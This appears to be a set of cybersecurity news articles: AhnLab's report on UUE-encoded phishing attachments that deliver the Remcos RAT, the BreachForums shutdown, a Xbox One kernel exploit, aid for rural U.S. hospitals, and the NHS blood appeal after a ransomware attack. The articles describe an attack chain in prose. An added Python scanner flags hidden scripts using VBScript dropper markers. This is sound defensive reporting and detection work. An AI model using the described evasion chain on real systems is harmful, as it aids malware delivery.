Researchers from AhnLab discovered that the threat actors behind the campaign use UUEncoding files with a .UUE extension, a format designed to encode binary data as plain text so that it can be attached to e-mail or Usenet messages. The malicious .UUE files attached to the phishing emails encode a VBS script. The threat actors appear to have chosen this file format and encoding technique in an attempt to bypass detection. When decoded, the VBS script is obfuscated, making it difficult for researchers to analyze. The script saves a PowerShell script into the %Temp% directory and executes it. The running script then downloads the file Haartoppens.Eft, which executes an additional PowerShell script. This script is also obfuscated and is designed to load shellcode into the wab.exe process. The shellcode maintains persistence by adding a registry key to the infected system, and then contacts a remote C&C server for additional instructions. Those instructions ultimately download the Remcos RAT malware for execution on the infected system.
Remcos RAT Malware
The Remcos RAT collects system information from infected systems and stores keylogging data in the %AppData% directory. The malware then sends this data to the remote command-and-control (C&C) server, which is hosted through a DuckDNS domain.
Remcos is a commercial remote access tool (RAT) that is advertised as a legitimate tool but has been observed in numerous threat actor campaigns. Successful loading of Remcos opens a backdoor on targeted systems, allowing complete control. The researchers have shared indicators of compromise (file hashes, detection names and C&C domains) to help detect and stop this campaign, along with the following recommendations:
- Refrain from accessing emails from unknown sources.
- Refrain from running or enabling macro commands when opening downloaded attachments. Users can set applications to their highest security level, as lower levels may execute macro commands automatically without displaying any notification.
- Update anti-malware engines to their latest versions.
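As an added example (not AhnLab's code and not part of the original article), the following Python parser handles the UUE format described above: it decodes an attachment and flags a script file hidden inside it by its declared filename and by crude VBScript content markers, as a mail gateway filter might. The sample attachments, their contents and the benign filename are constructed here; only the lure name is modelled on the reported one.

```python
import binascii
import os
import re

# Extensions a mail gateway should not see hidden inside a "plain text" UUE attachment.
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd"}
# Crude content markers for VBScript droppers (case-insensitive substring match).
VBS_MARKERS = ("createobject(", "wscript.", "execute(")

def decode_uue(text: str) -> tuple[str, bytes]:
    """Parse 'begin <mode> <name>' / data lines / '`' / 'end'; return (name, bytes)."""
    name, payload, in_body = None, bytearray(), False
    for line in text.splitlines():
        if not in_body:
            m = re.match(r"^begin\s+[0-7]{3,4}\s+(.+)$", line)
            if m:
                name, in_body = m.group(1).strip(), True
            continue
        if line.strip() == "end":
            break
        if line:  # a blank line is tolerated in place of the '`' terminator line
            payload += binascii.a2b_uu(line)  # each data line starts with a length char
    if name is None:
        raise ValueError("no uuencode 'begin' header found")
    return name, bytes(payload)

def assess_uue_attachment(text: str) -> dict:
    """Decode a UUE attachment and flag an embedded script by name and content."""
    name, data = decode_uue(text)
    ext = os.path.splitext(name)[1].lower()
    head = data[:4096].decode("latin-1").lower()
    markers = [m for m in VBS_MARKERS if m in head]
    return {"name": name, "size": len(data), "script_extension": ext in SCRIPT_EXTENSIONS,
            "vbs_markers": markers, "suspicious": ext in SCRIPT_EXTENSIONS or bool(markers)}

def encode_uue(filename: str, data: bytes) -> str:
    """Build a uuencoded blob; used here only to construct offline samples."""
    lines = [f"begin 644 {filename}"]
    lines += [binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n")
              for i in range(0, len(data), 45)]
    return "\n".join(lines + ["`", "end"]) + "\n"

# Constructed samples (not from the campaign): a harmless VBScript under a filename
# modelled on the reported lure, and a genuinely benign text attachment.
SAMPLE_VBS = b'Set sh = CreateObject("WScript.Shell")\r\nMsgBox "constructed sample"\r\n'
SAMPLE_UUE = encode_uue("Invoice_order_new.vbs", SAMPLE_VBS)
BENIGN_UUE = encode_uue("notes.txt", b"Quarterly figures attached, see sheet 2.\n")

if __name__ == "__main__":
    for sample in (SAMPLE_UUE, BENIGN_UUE):
        print(assess_uue_attachment(sample))
```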
BreachForums Down, Official Telegram Channels Deleted and Database Potentially Leaked
BreachForums Down with '502- Bad Gateway' Error
BreachForums had earlier faced an official domain seizure by the FBI in a coordinated effort with various law enforcement agencies. Shortly afterwards, however, 'ShinyHunters' managed to recover the seized domains; allegedly leaked FBI communications indicated that the agency had lost control over the domain, while BreachForums staff claimed that it had been transferred to a different host. Now the site appears to be down again, this time with no seizure notice present, leading to speculation over what has struck the site and its admin ShinyHunters. On X and LinkedIn, security researcher Vinny Troia claimed that ShinyHunters had sent a direct message through Telegram indicating that he was retiring from the forums, as it was 'too much heat', and had shut it down.
Both the researcher's X and LinkedIn posts attribute this incident to the FBI 'nabbing' ShinyHunters, even congratulating the agency.
BreachForums Telegram Channels Deleted
Shortly after the official domains went down, several official Telegram accounts associated with BreachForums, including the main announcement channel and the Jacuzzi 2.0 account, were deleted. Forum moderator Aegis stated in a PGP-signed message that ShinyHunters had been banned from Telegram.
In a new 'Jacuzzi' Telegram channel created shortly afterwards, a pinned message appears to confirm that the administrator ShinyHunters had quit, no longer wishing to maintain the forum. The message affirms that Shiny had not been arrested but had quit, and that the forum had not been officially seized but taken down.
A while later, a database allegedly containing data from the 'breachforums.is' domain (the previous official domain associated with BreachForums before it shifted to the .st domain) began circulating among Telegram data leak and sharing channels. Another threat actor stated that the circulating leaks were likely an attempt to gain attention and subscribers in light of recent events, noting that the data is unverified and password-protected.
Several threat actors attempted to use these disruptions to promote their own alternatives, such as Secretforums and Breach Nation. However, the administrator Astounded, who owned Secretforums, had himself recently announced his retirement from forum activity. The threat actor USDoD still appears to be promoting their Breach Nation as an alternative to BreachForums, even welcoming the move as a takedown of 'competitors.'
These incidents, along with ShinyHunters' disappearance, the deletion or unavailability of official channels, and the arrests and disruptions associated with the forums, raise uncertainty over the community's future prospects as well as larger implications for data leak sharing. This article will be updated as we gather more information on events surrounding BreachForums.
Modder Discovered Kernel-Level Exploit in Xbox One Consoles
'Game Script' Xbox Console Kernel-Level Exploit
carrot_c4k3, the individual behind the discovery, disclosed on X that the exploit, which is not a jailbreak, works against the System OS software on newer Xbox consoles such as the Xbox One. System OS exists to enable developers to run a wide variety of applications on these consoles through virtualization technology; applications downloaded from the Microsoft Store run on this layer. Xbox users can typically gain access to this environment by enabling developer mode on their consoles. However, carrot_c4k3 stated that while the exploit allows full control over the VM for homebrew on retail Xbox consoles, it does not enable the use of pirated software. The method currently relies on the Game Script UWA application available on the Microsoft Store, which allows users to run custom languages on the devices. The exploit consists of two components:
- User mode: Initial steps where the user gains native code execution in the context of UWP (Microsoft Store) applications.
- Kernel exploit: In this step the user exploits a kernel vulnerability on these devices to gain full read/write permissions, which would then enable them to elevate the privileges of a particular running process.
Exploit Might Have Been Patched In Newer Xbox Firmware Versions
A set of steps to be performed for the hack was shared on the Xbox One Research Github page:
- Ensure your Xbox Live account Login-Type is configured as “No barriers” aka. auto-login with no password prompt
- Set your console as “Home Console” for this account
- Download the App Game Script
- Start the app (to ensure license is downloaded/cached)
- Take your console offline! To make extra sure it cannot reach the internet, set a manual primary DNS address of 127.0.0.1
- Get a device/microcontroller that can simulate a Keyboard (rubber ducky or similar) - otherwise you have to type a lot manually :D
The page states that the exploit is "likely to be patched soon (in next System Update)." A thread on GBAtemp.net, a forum for discussing various video game platforms, stated that the latest firmware update for the Xbox One console has reportedly already patched the exploit, making firmware 10.0.25398.4478 the last exploitable version. While the full consequences of this exploit and the one that will be shared are unknown, it highlights the interest that console players have in bypassing manufacturer-intended device limits.
Microsoft and Google Announce Plans to Help Rural U.S. Hospitals Defend Against Cyberattacks
Microsoft and Google Cybersecurity Plans for Rural Hospitals
Microsoft has launched a full-fledged cybersecurity program to meet the needs of rural hospitals, which are often more vulnerable to cyberattacks because they have more limited IT security resources, staff and training than their urban peers. The program will deliver free and low-cost technology services, including:
- Nonprofit pricing and discounts of up to 75% on Microsoft's security products for independent Critical Access Hospitals and Rural Emergency Hospitals.
- Free advanced security suites for larger rural hospitals already equipped with eligible Microsoft solutions.
- Free Windows 10 security updates for participating rural hospitals for at least one year.
- Cybersecurity assessments and training are being made free to hospital employees to help them better manage system security.
“Cyber-attacks against the U.S. healthcare systems rose 130% in 2023, forcing hospitals to cancel procedures and impacting Americans’ access to critical care. Rural hospitals are particularly hard hit as they are often the sole source of care for the communities they serve and lack trained cyber staff and modern cyber defenses. President Biden is committed to every American having access to the care they need, and effective cybersecurity is a part of that. So, we’re excited to work with Microsoft to launch cybersecurity programs that will provide training, advice and technology to help America’s rural hospitals be safe online.”
Alongside Microsoft's efforts, Google also announced that it will provide free cybersecurity advice to rural hospitals and non-profit organizations while also launching a pilot program to match its cybersecurity services with the specific needs of rural healthcare facilities.
Plans Are Part of Broader National Effort
Rural hospitals remain one of the most common targets for cyberattacks, according to data from the National Rural Health Association. Rural hospitals in the U.S. serve over 60 million people living in rural areas, who sometimes have to travel considerable distances for care even without the disruption of a cyberattack. Neuberger stated, “We’re in new territory as we see ... this wave of attacks against hospitals.” Rick Pollack, president of the American Hospital Association, said, “Rural hospitals are often the primary source of healthcare in their communities, so keeping them open and safe from cyberattacks is critical. We appreciate Microsoft stepping forward to offer its expertise and resources to help secure part of America’s healthcare safety net.” The plans are part of a broader effort by the United States government to direct private partners and tech giants such as Microsoft and Google to use their expertise to plug significant gaps in the defense of the healthcare sector.
NHS Makes Urgent Request for Blood Donations After Ransomware Attack Interrupts Blood Transfusions
NHS Blood and Transplant's Urgent Appeal for Blood Donations
The recent cyberattack on the pathology firm Synnovis, believed to have been orchestrated by the Russian cybercriminal group Qilin, caused significant disruption to several London hospitals. As a result, affected hospitals have been unable to match patients' blood at the usual rates, leading to the declaration of a critical incident and the cancellation of scheduled blood transfusions. Gail Miflin, chief medical officer at NHS Blood and Transplant, emphasized the importance of O blood-type donations during this critical time. She called on existing O blood donors to book urgent appointments and encouraged potential new donors to find out their blood type and contribute to solving the shortage. During NHS National Blood Week, it was revealed that hospitals require three blood donations every minute. With around 13,000 appointments available nationwide this week, and 3,400 specifically in London, there are many opportunities for donors to come forward and contribute to blood availability. Stephen Powis, the medical director for NHS England, praised the resilience of NHS staff amid the cyberattack and urged eligible donors to come forward to one of the 13,000 available appointments in NHS blood donor centers across the country. To learn more and find details on how to donate, interested individuals are encouraged to search 'GiveBlood' online and on social media or visit Blood.co.uk.
Impact of the Cyberattack on London Hospitals
Several prominent London hospitals, including King's College Hospital, Guy's and St Thomas', the Royal Brompton, and the Evelina London Children's Hospital, declared a critical incident following the cyberattack on the pathology firm Synnovis, which provides blood-testing services to these hospitals and several others in southeast London. The severe disruption forced hospital staff to cancel procedures such as cancer surgeries and transplants because blood transfusion services were unavailable. In a statement on its official website, an NHS London spokesperson stressed the importance of pathology services to health treatment procedures:
“NHS staff are working around the clock to minimise the significant disruption to patient care following the ransomware cyber-attack and we are sorry to all those who have been impacted. Pathology services are integral to a wide range of treatments and we know that a number of operations and appointments have been cancelled due to this attack. We are still working with hospitals and local GP services to fully assess the disruption, and ensure the data is accurate. In the meantime our advice to patients remains, if you have not been contacted please do continue to attend your appointments.”
A senior NHS manager disclosed to the Health Service Journal (HSJ) that the incident was “everyone’s worst nightmare.” As blood has a limited shelf life of 35 days, it is critical that these hospital stocks are continually replenished. More units of O-negative and O-positive blood will be required over the coming weeks to accommodate an anticipated increase in surgeries and procedures due to the earlier delays.